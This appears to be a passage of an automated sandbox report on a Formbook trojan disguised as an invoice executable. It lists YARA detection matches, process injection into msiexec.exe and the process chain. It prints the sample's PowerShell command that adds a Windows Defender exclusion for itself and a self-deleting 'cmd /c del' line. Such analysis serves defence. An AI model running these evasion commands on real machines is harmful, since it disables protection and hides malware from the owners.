          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470A8407_2_0470A840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047028407_2_04702840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0472E8F07_2_0472E8F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E68B87_2_046E68B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047169627_2_04716962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047029A07_2_047029A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047CA9A67_2_047CA9A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FEA807_2_046FEA80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BAB407_2_047BAB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B6BD77_2_047B6BD7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F14607_2_046F1460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BF43F7_2_047BF43F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B75717_2_047B7571
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047C95C37_2_047C95C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0479D5B07_2_0479D5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047456307_2_04745630
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B16CC7_2_047B16CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BF7B07_2_047BF7B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B70E97_2_047B70E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BF0E07_2_047BF0E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047070C07_2_047070C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047AF0CC7_2_047AF0CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047CB16B7_2_047CB16B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EF1727_2_046EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473516C7_2_0473516C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470B1B07_2_0470B1B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047A12ED7_2_047A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0471B2C07_2_0471B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047052A07_2_047052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046ED34C7_2_046ED34C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B132D7_2_047B132D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0474739A7_2_0474739A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04779C327_2_04779C32
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BFCF27_2_047BFCF2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B7D737_2_047B7D73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B1D5A7_2_047B1D5A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04703D407_2_04703D40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0471FDC07_2_0471FDC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04709EB07_2_04709EB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BFF097_2_047BFF09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C3FD57_2_046C3FD5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C3FD27_2_046C3FD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BFFB17_2_047BFFB1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04701F927_2_04701F92
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476D8007_2_0476D800
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047038E07_2_047038E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047099507_2_04709950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0471B9507_2_0471B950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047959107_2_04795910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04773A6C7_2_04773A6C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BFA497_2_047BFA49
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047B7A467_2_047B7A46
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047ADAC67_2_047ADAC6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04745AA07_2_04745AA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0479DAAC7_2_0479DAAC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047A1AA37_2_047A1AA3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047BFB767_2_047BFB76
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04775BF07_2_04775BF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473DBF97_2_0473DBF9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0471FB807_2_0471FB80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EC3EA7_2_005EC3EA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EE56E7_2_005EE56E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EE7D27_2_005EE7D2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EDAFB7_2_005EDAFB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005D2D907_2_005D2D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005D2D897_2_005D2D89
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005D9E5B7_2_005D9E5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005D9E607_2_005D9E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EDF727_2_005EDF72
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005D2FB07_2_005D2FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0460A0367_2_0460A036
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04602D027_2_04602D02
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0460E5CD7_2_0460E5CD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046010827_2_04601082
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046089127_2_04608912
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0460B2327_2_0460B232
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04605B307_2_04605B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04605B327_2_04605B32
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: String function: 0110F290 appears 105 times
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: String function: 010C5130 appears 58 times
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: String function: 010FEA12 appears 86 times
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: String function: 0107B970 appears 280 times
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: String function: 010D7E54 appears 111 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0477F290 appears 105 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04735130 appears 58 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04747E54 appears 111 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 046EB970 appears 280 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0476EA12 appears 86 times
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000000.00000002.2140466216.00000000029F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000000.00000002.2138927744.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000000.00000002.2145814793.0000000006C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000000.00000002.2141241119.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000000.00000002.2146060920.0000000006CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2259640251.000000000117D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258386431.0000000000D8F000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258639330.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258639330.0000000000DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeBinary or memory string: OriginalFilenameSNCx.exe4 vs INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4585321350.0000000010FB7000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe PID: 4512, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe PID: 3492, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
          Source: Process Memory Space: msiexec.exe PID: 1428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, EAys4YGB7vGVXp1hhL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, EAys4YGB7vGVXp1hhL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, KmS8hjV3UlaappQopN.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, EAys4YGB7vGVXp1hhL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.2bcdc28.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.2baca58.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6ca0000.9.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winEXE@523/6@14/5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A22F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,7_2_00A22F93
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A27DD0 StartServiceCtrlDispatcherW,GetLastError,7_2_00A27DD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A27DD0 StartServiceCtrlDispatcherW,GetLastError,7_2_00A27DD0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmgddcww.drg.ps1Jump to behavior
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeReversingLabs: Detection: 91%
          Source: unknownProcess created: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess created: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"Jump to behavior
